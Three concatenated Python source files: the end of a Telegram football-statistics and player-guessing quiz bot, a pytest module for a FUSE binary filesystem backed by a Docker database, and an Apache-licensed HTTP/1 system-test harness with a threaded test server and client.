cursor.execute('SELECT EXISTS(SELECT userId FROM users WHERE "userid" = CAST(%s AS VARCHAR))', from_user)
check = cursor.fetchone()
if not check[0]:
cursor.execute('INSERT INTO users (userId) VALUES (%s)', from_user)
db.commit()
count = cursor.rowcount
print(count, "Record inserted successfully into users table")
else:
count = cursor.rowcount
print(count, "Record already exists")
start_msg = 'Hey *{}* 👋, I\'m *FootGuessr Bot* 🤖!\n\n' \
'With my help you can play the game to guess 🤔 the player\'s name from their statistics.\n\n' \
'Also you can see:\n\t\t\t- results of football events ⚽' \
'\n\t\t\t- statistics of different leagues 📈' \
'\n\t\t\t- statistics of players 🏃🏽♀️\n\n' \
'Player data is taken from [Wiki](https://en.wikipedia.org/wiki/Main_Page).\n' \
'Football stats from [Livescores](https://www.livescores.com).\n\n' \
'Press any button below to interact with me 😀\n\n' \
'Made by *@gorik333* '
bot.send_message(m.chat.id, start_msg.format(m.from_user.first_name), reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
except Exception as error:
print("Error occurred", error)
# Main Menu
@bot.message_handler(regexp="👈 Main Menu")
def main_menu(m):
"""[note]:
Handles the **/Main Menu** button.
"""
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Check Statistics', 'ℹ️ Help')
user_markup.row('⚽ Start the Game')
user_msg = 'Return to the main menu.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# Help Menu
@bot.message_handler(regexp="ℹ️ Help")
def command_help(m):
"""[note]:
Handles the **/Help** button.
"""
help_text = "*FootGuessr Bot* 🤖: Send a private message to one of my creators *@gorik333*, " \
"if you need help with something."
bot.send_message(m.chat.id, help_text, parse_mode='Markdown', disable_web_page_preview="True")
# Football Stat Menu
@bot.message_handler(regexp="⚽ Check Statistics")
def send_football(m):
"""[note]:
Handles the league selection menu.
"""
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('🏴 England', '🇪🇸 Spain')
user_markup.row('🇩🇪 Germany', '🇫🇷 France')
user_markup.row('🇮🇹 Italy', '🇺🇦 Ukraine')
user_markup.row('👈 Main Menu')
user_msg = 'Football Statistics from Top-Leagues 🔝 in Europe 🇪🇺\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# Back to Main Football Menu
@bot.message_handler(regexp="👈 Back")
def football_back(m):
"""[note]:
Handles the Back button
"""
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('🏴 England', '🇪🇸 Spain')
user_markup.row('🇩🇪 Germany', '🇫🇷 France')
user_markup.row('🇮🇹 Italy', '🇺🇦 Ukraine')
user_markup.row('👈 Main Menu')
user_msg = 'Return to Main Football Menu.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# ============== English Premier League ==============
@bot.message_handler(regexp="🏴 England")
def send_england(m):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Premier League Table', '⚽ Premier League Upcoming Events')
user_markup.row('⚽ Premier League Latest Results', '👈 Back')
user_msg = 'English Premier League Table and Scores.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# Premier League Table
@bot.message_handler(regexp="⚽ Premier League Table")
def send_en_table(message):
url = "http://www.livescores.com/soccer/england/premier-league/"
user_msg = ChampionshipTable(url, table_width=9, table_height=21).create_table()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Premier League Scores
@bot.message_handler(regexp="⚽ Premier League Upcoming Events")
def send_en_scores(message):
url = "http://www.livescores.com/soccer/england/premier-league/"
user_msg = ChampionshipScores(url).scrape_score()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Premier League Results (Last Week)
@bot.message_handler(regexp="⚽ Premier League Latest Results")
def send_en_latest(message):
url = "http://www.livescores.com/soccer/england/premier-league/results/7-days/"
user_msg = ChampionshipLatest(url).parse_latest()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# ============== Spanish La Liga ==============
@bot.message_handler(regexp="🇪🇸 Spain")
def send_spain(m):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ La Liga Table', '⚽ La Liga Upcoming Events')
user_markup.row('⚽ La Liga Latest Results', '👈 Back')
user_msg = 'Spanish La Liga Table and Scores.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# La Liga Table
@bot.message_handler(regexp="⚽ La Liga Table")
def send_es_table(message):
url = "http://www.livescores.com/soccer/spain/primera-division/"
user_msg = ChampionshipTable(url, table_width=9, table_height=21).create_table()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# La Liga Scores
@bot.message_handler(regexp="⚽ La Liga Upcoming Events")
def send_es_scores(message):
url = "http://www.livescores.com/soccer/spain/primera-division/"
user_msg = ChampionshipScores(url).scrape_score()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# La Liga Results (Last Week)
@bot.message_handler(regexp="⚽ La Liga Latest Results")
def send_es_latest(message):
url = "http://www.livescores.com/soccer/spain/primera-division/results/7-days/"
user_msg = ChampionshipLatest(url).parse_latest()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# ============== German Bundesliga ==============
@bot.message_handler(regexp="🇩🇪 Germany")
def send_germany(m):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Bundesliga Table', '⚽ Bundesliga Upcoming Events')
user_markup.row('⚽ Bundesliga Latest Results', '👈 Back')
user_msg = 'German Bundesliga Table and Scores.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# Bundesliga Table
@bot.message_handler(regexp="⚽ Bundesliga Table")
def send_de_table(message):
url = "http://www.livescores.com/soccer/germany/bundesliga/"
user_msg = ChampionshipTable(url, table_width=9, table_height=19).create_table()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Bundesliga Scores
@bot.message_handler(regexp="⚽ Bundesliga Upcoming Events")
def send_de_scores(message):
url = "http://www.livescores.com/soccer/germany/bundesliga/"
user_msg = ChampionshipScores(url).scrape_score()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Bundesliga Results (Last Week)
@bot.message_handler(regexp="⚽ Bundesliga Latest Results")
def send_de_latest(message):
url = "http://www.livescores.com/soccer/germany/bundesliga/results/7-days/"
user_msg = ChampionshipLatest(url).parse_latest()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# ============== French Ligue 1 ==============
@bot.message_handler(regexp="🇫🇷 France")
def send_france(m):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Ligue 1 Table', '⚽ Ligue 1 Upcoming Events')
user_markup.row('⚽ Ligue 1 Latest Results', '👈 Back')
user_msg = 'French Ligue 1 Table and Scores.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# Ligue 1 Table
@bot.message_handler(regexp="⚽ Ligue 1 Table")
def send_fr_table(message):
url = "http://www.livescores.com/soccer/france/ligue-1/"
user_msg = ChampionshipTable(url, table_width=9, table_height=21).create_table()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Ligue 1 Scores
@bot.message_handler(regexp="⚽ Ligue 1 Upcoming Events")
def send_fr_scores(message):
url = "http://www.livescores.com/soccer/france/ligue-1/"
user_msg = ChampionshipScores(url).scrape_score()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Ligue 1 Results (Last Week)
@bot.message_handler(regexp="⚽ Ligue 1 Latest Results")
def send_fr_latest(message):
url = "http://www.livescores.com/soccer/france/ligue-1/results/7-days/"
user_msg = ChampionshipLatest(url).parse_latest()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# ============== Italian Serie A ==============
@bot.message_handler(regexp="🇮🇹 Italy")
def send_italy(m):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Serie A Table', '⚽ Serie A Upcoming Events')
user_markup.row('⚽ Serie A Latest Results', '👈 Back')
user_msg = 'Italian Serie A Table and Scores.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# Serie A Table
@bot.message_handler(regexp="⚽ Serie A Table")
def send_it_table(message):
url = "http://www.livescores.com/soccer/italy/serie-a/"
user_msg = ChampionshipTable(url, table_width=9, table_height=21).create_table()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Serie A Scores
@bot.message_handler(regexp="⚽ Serie A Upcoming Events")
def send_it_scores(message):
url = "http://www.livescores.com/soccer/italy/serie-a/"
user_msg = ChampionshipScores(url).scrape_score()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Serie A Results (Last Week)
@bot.message_handler(regexp="⚽ Serie A Latest Results")
def send_it_latest(message):
url = "http://www.livescores.com/soccer/italy/serie-a/results/7-days/"
user_msg = ChampionshipLatest(url).parse_latest()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# ============== Ukrainian Premier League ==============
@bot.message_handler(regexp="🇺🇦 Ukraine")
def send_ukraine(m):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ UPL Table', '⚽ UPL Upcoming Events')
user_markup.row('⚽ UPL Latest Results', '👈 Back')
user_msg = 'Ukrainian Premier League Table and Scores.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# UPL Table
@bot.message_handler(regexp="⚽ UPL Table")
def send_ua_table(message):
url = "https://www.livescores.com/soccer/ukraine/premier-league/"
user_msg = ChampionshipTable(url, table_width=9, table_height=15).create_table()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# UPL Scores
@bot.message_handler(regexp="⚽ UPL Upcoming Events")
def send_ua_scores(message):
url = "https://www.livescores.com/soccer/ukraine/premier-league/"
user_msg = ChampionshipScores(url).scrape_score()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# UPL Results (Last Week)
@bot.message_handler(regexp="⚽ UPL Latest Results")
def send_ua_latest(message):
url = "http://www.livescores.com/soccer/ukraine/premier-league/results/7-days/"
user_msg = ChampionshipLatest(url).parse_latest()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Football Game Type
@bot.message_handler(regexp="⚽ Start the Game")
def start_game(m):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('Guessing by the picture', 'Guessing by the career')
user_msg = 'Choose the type of the game'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# ============== Guess Player by his/her Statistics (Poll) ==============
@bot.message_handler(regexp='Guessing by the career')
def guessing_game(message):
"""[note]:
Handles the mini-game
"""
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Check Statistics', 'ℹ️ Help')
user_markup.row('Guessing by the picture', "Guessing by the career")
reply = gen_player()
text = "```" + str(reply[0]) + "```"
bot.send_message(message.chat.id, text, reply_markup=user_markup, parse_mode="MarkdownV2")
correct_answer = reply[1]
variants = [reply[1]]
for i in range(3):
flag = True
while flag:
temp = choice(list(open('players.txt', encoding='utf-8'))).replace('\n', '')
random_player = " ".join(temp.split("_"))
if random_player not in variants:
variants.append(random_player)
flag = False
shuffle(variants)
bot.send_poll(chat_id=message.chat.id, question="Try to guess the player, according to his career",
is_anonymous=True, options=variants, type="quiz",
correct_option_id=variants.index(correct_answer), reply_markup=user_markup,)
# ============== Guess Player by his/her picture ==============
@bot.message_handler(regexp='Guessing by the picture')
def guessing_by_picture(message):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Check Statistics', 'ℹ️ Help')
user_markup.row('Guessing by the picture', "Guessing by the career")
reply = gen_player()
correct_answer = reply[1]
variants = [reply[1]]
for i in range(3):
flag = True
while flag:
temp = choice(list(open('players.txt', encoding='utf-8'))).replace('\n', '')
random_player = " ".join(temp.split("_"))
if random_player not in variants:
variants.append(random_player)
flag = False
shuffle(variants)
bot.send_photo(message.chat.id, reply[2])
bot.send_poll(chat_id=message.chat.id, question="Try to guess the player, according to his picture",
is_anonymous=True, options=variants, type="quiz",
correct_option_id=variants.index(correct_answer), reply_markup=user_markup,)
polling_thread = threading.Thread(target=bot_polling)
polling_thread.daemon = True
polling_thread.start()
# Keep main program running while bot runs threaded
if __name__ == "__main__":
while True:
try:
sleep(120)
except KeyboardInterrupt:
break
|
test_binary_filesystem.py
|
"""
Test CRUD operations on the brain binary filesystem:
put, list_dir, get, delete
"""
from os import environ, remove
from pytest import fixture, raises
import docker
import tempfile
from time import sleep
from multiprocessing import Process
from .brain import connect, r
from .brain.binary.data import put, get, list_dir, delete
from .brain.queries import RBF
from .brain.brain_pb2 import Binary
from .brain.binary import filesystem as bfs
from .test_put_and_get_binary import test_ensure_files_table_exists as check_files_table
CLIENT = docker.from_env()
TEST_FILE_NAME = "TEST_FILE.txt"
TEST_FILE_CONTENT = "content data is binary 灯火 标 and string stuff ".encode('utf-8')
@fixture(scope='module')
def rethink():
tag = environ.get("TRAVIS_BRANCH", "dev").replace("master", "latest")
container_name = "brainmoduletestFilesystem"
CLIENT.containers.run(
"ramrodpcp/database-brain:{}".format(tag),
name=container_name,
detach=True,
ports={"28015/tcp": 28015},
remove=True
)
check_files_table(None)
with tempfile.TemporaryDirectory() as tf:
p = Process(target=bfs.start_filesystem, args=(tf,))
p.start()
yield tf
p.terminate()
p.join(5)
# Teardown for module tests
containers = CLIENT.containers.list()
for container in containers:
if container.name == container_name:
container.stop()
break
def test_temp_folder_exists(rethink):
sleep(3)  # account for FUSE startup
assert rethink
def test_write_a_file(rethink):
if not environ.get("TRAVIS_BRANCH"):
with open("{}/{}".format(rethink, TEST_FILE_NAME), "wb") as f:
f.write(TEST_FILE_CONTENT)
sleep(2)  # push to the database is asynchronous after close
assert TEST_FILE_NAME in list_dir()
def test_read_a_file(rethink):
if not environ.get("TRAVIS_BRANCH"):
with open("{}/{}".format(rethink, TEST_FILE_NAME), "rb") as f:
local_file_content = f.read()
assert TEST_FILE_CONTENT == local_file_content
def test_delete_a_file(rethink):
"""
File removal through the filesystem is disabled by default;
it can be enabled by setting brain.binary.filesystem.ALLOW_REMOVE to True before launching the fs.
:param rethink:
:return:
"""
if not environ.get("TRAVIS_BRANCH"):
remove("{}/{}".format(rethink, TEST_FILE_NAME))
sleep(4)
assert TEST_FILE_NAME in list_dir()
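# The assert above expects the file to survive `remove` because removal is
# disabled by default. A minimal sketch of enabling it, assuming ALLOW_REMOVE is a
# module-level flag as the docstring above describes (not exercised in this test):
#
#   from .brain.binary import filesystem as bfs
#   bfs.ALLOW_REMOVE = True   # hypothetical flag; must be set before start_filesystem()
#   p = Process(target=bfs.start_filesystem, args=(mount_dir,))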
|
http1_tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import socket
import uuid
from threading import Thread
from time import sleep
try:
from http.server import HTTPServer, BaseHTTPRequestHandler
from http.client import HTTPConnection
from http.client import HTTPException
except ImportError:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from httplib import HTTPConnection, HTTPException
from system_test import TestCase, TIMEOUT, Logger, Qdrouterd
TEST_SERVER_ERROR = "TestServer failed to start because port %s is already in use"
class RequestHandler(BaseHTTPRequestHandler):
"""
Dispatches requests received by the HTTPServer based on the method
"""
protocol_version = 'HTTP/1.1'
def _execute_request(self, tests):
for req, resp, val in tests:
if req.target == self.path:
xhdrs = None
if "test-echo" in self.headers:
xhdrs = {"test-echo":
self.headers["test-echo"]}
self._consume_body()
if not isinstance(resp, list):
resp = [resp]
for r in resp:
r.send_response(self, extra_headers=xhdrs)
self.server.request_count += 1
return
self.send_error(404, "Not Found")
def do_GET(self):
self._execute_request(self.server.system_tests["GET"])
def do_HEAD(self):
self._execute_request(self.server.system_tests["HEAD"])
def do_POST(self):
if self.path == "/SHUTDOWN":
self.send_response(200, "OK")
self.send_header("Content-Length", "13")
self.end_headers()
self.wfile.write(b'Server Closed')
self.wfile.flush()
self.close_connection = True
self.server.server_killed = True
return
self._execute_request(self.server.system_tests["POST"])
def do_PUT(self):
self._execute_request(self.server.system_tests["PUT"])
# these overrides just quiet the test output
# comment them out to help debug:
def log_request(self, code=None, size=None):
pass
def log_message(self, format=None, *args):
pass
def _consume_body(self):
"""
Read the entire body off the rfile. This must be done to allow
multiple requests on the same socket
"""
if self.command == 'HEAD':
return b''
for key, value in self.headers.items():
if key.lower() == 'content-length':
return self.rfile.read(int(value))
if key.lower() == 'transfer-encoding' \
and 'chunked' in value.lower():
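# A chunked body is a sequence of "<hex-size>[;extensions]\r\n<data>\r\n"
# frames terminated by a zero-size chunk, e.g. b'5\r\nhello\r\n0\r\n\r\n'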
body = b''
while True:
header = self.rfile.readline().strip().split(b';')[0]
hlen = int(header, base=16)
if hlen > 0:
data = self.rfile.read(hlen + 2) # 2 = \r\n
body += data[:-2]
else:
self.rfile.readline() # discard last \r\n
break
return body
return self.rfile.read()
class RequestHandler10(RequestHandler):
"""
RequestHandler that forces the server to use HTTP version 1.0 semantics
"""
protocol_version = 'HTTP/1.0'
class MyHTTPServer(HTTPServer):
"""
Adds a switch to the HTTPServer to allow it to exit gracefully
"""
def __init__(self, addr, handler_cls, testcases):
self.system_tests = testcases
self.request_count = 0
HTTPServer.__init__(self, addr, handler_cls)
def server_close(self):
try:
# force immediate close of listening socket
self.socket.shutdown(socket.SHUT_RDWR)
except Exception:
pass
HTTPServer.server_close(self)
class ThreadedTestClient(object):
"""
An HTTP client running in a separate thread
"""
def __init__(self, tests, port, repeat=1):
self._id = uuid.uuid4().hex
self._conn_addr = ("127.0.0.1:%s" % port)
self._tests = tests
self._repeat = repeat
self._logger = Logger(title="TestClient: %s" % self._id,
print_to_console=False)
self._thread = Thread(target=self._run)
self._thread.daemon = True
self.error = None
self.count = 0
self._thread.start()
def _run(self):
self._logger.log("TestClient connecting on %s" % self._conn_addr)
client = HTTPConnection(self._conn_addr, timeout=TIMEOUT)
self._logger.log("TestClient connected")
for loop in range(self._repeat):
self._logger.log("TestClient start request %d" % loop)
for op, tests in self._tests.items():
for req, _, val in tests:
self._logger.log("TestClient sending %s %s request" % (op, req.target))
req.send_request(client,
{"test-echo": "%s-%s-%s-%s" % (self._id,
loop,
op,
req.target)})
self._logger.log("TestClient getting %s response" % op)
try:
rsp = client.getresponse()
except HTTPException as exc:
self._logger.log("TestClient response failed: %s" % exc)
self.error = str(exc)
return
self._logger.log("TestClient response %s received" % op)
if val:
try:
body = val.check_response(rsp)
except Exception as exc:
self._logger.log("TestClient response invalid: %s"
% str(exc))
self.error = "client failed: %s" % str(exc)
return
if req.method == "BODY" and body != b'':
self._logger.log("TestClient response invalid: %s"
% "body present!")
self.error = "error: body present!"
return
self.count += 1
self._logger.log("TestClient request %s %s completed!" %
(op, req.target))
client.close()
self._logger.log("TestClient to %s closed" % self._conn_addr)
def wait(self, timeout=TIMEOUT):
self._thread.join(timeout=timeout)
self._logger.log("TestClient %s shut down" % self._conn_addr)
sleep(0.5) # fudge factor allow socket close to complete
def dump_log(self):
self._logger.dump()
class TestServer(object):
"""
A HTTPServer running in a separate thread
"""
@classmethod
def new_server(cls, server_port, client_port, tests, handler_cls=None):
num_attempts = 0
max_attempts = 4
while num_attempts < max_attempts:
try:
# Create an instance of TestServer. This might fail because the port has
# not been relinquished yet. Try for a max of 4 seconds before giving up.
server11 = TestServer(server_port=server_port,
client_port=client_port,
tests=tests,
handler_cls=handler_cls)
# Return the successfully created server.
return server11
except OSError:
# TestServer creation failed. Try again in one second, for a max of 4 seconds.
num_attempts += 1
sleep(1)
return None
def __init__(self, server_port, client_port, tests, handler_cls=None):
self._logger = Logger(title="TestServer", print_to_console=False)
self._client_port = client_port
self._server_addr = ("", server_port)
self._server = MyHTTPServer(self._server_addr,
handler_cls or RequestHandler,
tests)
self._server.allow_reuse_address = True
self._thread = Thread(target=self._run)
self._thread.daemon = True
self._thread.start()
def _run(self):
self._logger.log("TestServer listening on %s:%s" % self._server_addr)
try:
self._server.server_killed = False
while not self._server.server_killed:
self._server.handle_request()
except Exception as exc:
self._logger.log("TestServer %s crash: %s" %
(self._server_addr, exc))
raise
self._logger.log("TestServer %s:%s closed" % self._server_addr)
def wait(self, timeout=TIMEOUT):
self._logger.log("TestServer %s:%s shutting down" % self._server_addr)
self.request_count = 0
if self._thread.is_alive():
client = HTTPConnection("127.0.0.1:%s" % self._client_port,
timeout=TIMEOUT)
client.putrequest("POST", "/SHUTDOWN")
client.putheader("Content-Length", "0")
client.endheaders()
# 13 == len('Server Closed')
client.getresponse().read(13)
client.close()
self._thread.join(timeout=timeout)
if self._server:
self._server.server_close()
self.request_count = self._server.request_count
del self._server
sleep(0.5) # fudge factor allow socket close to complete
def http1_ping(sport, cport):
"""
Test the HTTP path by doing a simple GET request
"""
TEST = {
"GET": [
(RequestMsg("GET", "/GET/ping",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 4,
"Content-Type": "text/plain;charset=utf-8"},
body=b'pong'),
ResponseValidator(expect_body=b'pong'))
]
}
server = TestServer.new_server(sport, cport, TEST)
client = ThreadedTestClient(tests=TEST, port=cport)
client.wait()
server.wait()
return client.count, client.error
class ResponseMsg(object):
"""
A 'hardcoded' HTTP response message. This class writes its response
message when called by the HTTPServer via the BaseHTTPRequestHandler
"""
def __init__(self, status, version=None, reason=None,
headers=None, body=None, error=False):
self.status = status
self.version = version or "HTTP/1.1"
self.reason = reason
self.headers = headers or {}
self.body = body
self.error = error
def send_response(self, handler, extra_headers=None):
extra_headers = extra_headers or {}
if self.error:
handler.send_error(self.status,
message=self.reason)
return
handler.send_response(self.status, self.reason)
for key, value in self.headers.items():
handler.send_header(key, value)
for key, value in extra_headers.items():
handler.send_header(key, value)
handler.end_headers()
if self.body:
handler.wfile.write(self.body)
handler.wfile.flush()
class RequestMsg(object):
"""
A 'hardcoded' HTTP request message. This class writes its request
message to the HTTPConnection.
"""
def __init__(self, method, target, headers=None, body=None):
self.method = method
self.target = target
self.headers = headers or {}
self.body = body
def send_request(self, conn, extra_headers=None):
extra_headers = extra_headers or {}
conn.putrequest(self.method, self.target)
for key, value in self.headers.items():
conn.putheader(key, value)
for key, value in extra_headers.items():
conn.putheader(key, value)
conn.endheaders()
if self.body:
conn.send(self.body)
class ResponseValidator(object):
"""
Validate a response as received by the HTTP client
"""
def __init__(self, status=200, expect_headers=None, expect_body=None):
if expect_headers is None:
expect_headers = {}
self.status = status
self.expect_headers = expect_headers
self.expect_body = expect_body
def check_response(self, rsp):
if self.status and rsp.status != self.status:
raise Exception("Bad response code, expected %s got %s"
% (self.status, rsp.status))
for key, value in self.expect_headers.items():
if rsp.getheader(key) != value:
raise Exception("Missing/bad header (%s), expected %s got %s"
% (key, value, rsp.getheader(key)))
body = rsp.read()
if (self.expect_body and self.expect_body != body):
raise Exception("Bad response body expected %s got %s"
% (self.expect_body, body))
return body
class CommonHttp1Edge2EdgeTest(object):
def test_01_concurrent_requests(self):
"""
Test multiple concurrent clients sending streaming messages
"""
REQ_CT = 3 # 3 requests per TEST_*
TESTS_11 = {
"PUT": [
(RequestMsg("PUT", "/PUT/test_01_concurrent_requests_11",
headers={
"Transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# ~384K to trigger Q2
body=b'20000\r\n' + b'1' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'2' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'3' * 0x20000 + b'\r\n'
+ b'13\r\nEND OF TRANSMISSION\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/PUT/test_01_concurrent_requests_11",
"Content-Length": "0"}),
ResponseValidator(status=201)
)],
"GET": [
(RequestMsg("GET", "/GET/test_01_concurrent_requests_11_small",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"Content-Length": "19",
"Content-Type": "text/plain;charset=utf-8",
"Test-Header": "/GET/test_01_concurrent_requests_11_small"
},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)),
(RequestMsg("GET", "/GET/test_01_concurrent_requests_11",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8",
"Test-Header": "/GET/test_01_concurrent_requests_11"
},
# ~384K to trigger Q2
body=b'20000\r\n' + b'1' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'2' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'3' * 0x20000 + b'\r\n'
+ b'13\r\nEND OF TRANSMISSION\r\n'
+ b'0\r\n\r\n'),
ResponseValidator(status=200)
)],
}
TESTS_10 = {
"POST": [
(RequestMsg("POST", "/POST/test_01_concurrent_requests_10",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": "393216"},
body=b'P' * 393197
+ b'END OF TRANSMISSION'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/POST/test_01_concurrent_requests_10",
"Content-Length": "0"}),
ResponseValidator(status=201)
)],
"GET": [
(RequestMsg("GET", "/GET/test_01_concurrent_requests_10_small",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
# no content-length, server must close conn when done
headers={"Test-Header": "/GET/test_01_concurrent_requests_10_small",
"Content-Type": "text/plain;charset=utf-8"},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)),
(RequestMsg("GET", "/GET/test_01_concurrent_requests_10",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Test-Header": "/GET/test_01_concurrent_requests_10",
"Content-Length": "393215",
"Content-Type": "text/plain;charset=utf-8"},
body=b'G' * 393196
+ b'END OF TRANSMISSION'),
ResponseValidator(status=200)
)],
}
server11 = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS_11)
self.assertIsNotNone(server11, TEST_SERVER_ERROR % self.http_server11_port)
server10 = TestServer.new_server(self.http_server10_port, self.http_listener10_port, TESTS_10,
handler_cls=RequestHandler10)
self.assertIsNotNone(server10, TEST_SERVER_ERROR % self.http_server10_port)
self.EA2.wait_connectors()
repeat_ct = 10
client_ct = 4 # per version
clients = []
for _ in range(client_ct):
clients.append(ThreadedTestClient(TESTS_11,
self.http_listener11_port,
repeat=repeat_ct))
clients.append(ThreadedTestClient(TESTS_10,
self.http_listener10_port,
repeat=repeat_ct))
for client in clients:
client.wait()
try:
self.assertIsNone(client.error)
self.assertEqual(repeat_ct * REQ_CT, client.count)
except Exception:
client.dump_log()
raise
server11.wait()
self.assertEqual(client_ct * repeat_ct * REQ_CT,
server11.request_count)
server10.wait()
self.assertEqual(client_ct * repeat_ct * REQ_CT,
server10.request_count)
def test_02_credit_replenish(self):
"""
Verify credit is replenished by sending more requests than the
default credit window (250) across the routers.
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_02_credit_replenish",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "24",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_02_credit_replenish'),
ResponseValidator(status=200),
),
]
}
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=300)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(300, client.count)
server.wait()
def test_03_server_reconnect(self):
"""
Verify server reconnect logic.
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_03_server_reconnect",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "24",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_03_server_reconnect'),
ResponseValidator(status=200),
),
]
}
# bring up the server and send some requests. This will cause the
# router to grant credit for clients
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=2)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(2, client.count)
# simulate server loss. Fire up a client which should be granted
# credit since the adaptor does not immediately teardown the server
# links. This will cause the adaptor to run qdr_connection_process
# without a raw connection available to wake the I/O thread.
server.wait()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=2)
# the adaptor will detach the links to the server if the connection
# cannot be reestablished after 2.5 seconds. Restart the server before
# that occurs to prevent client messages from being released with 503
# status.
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
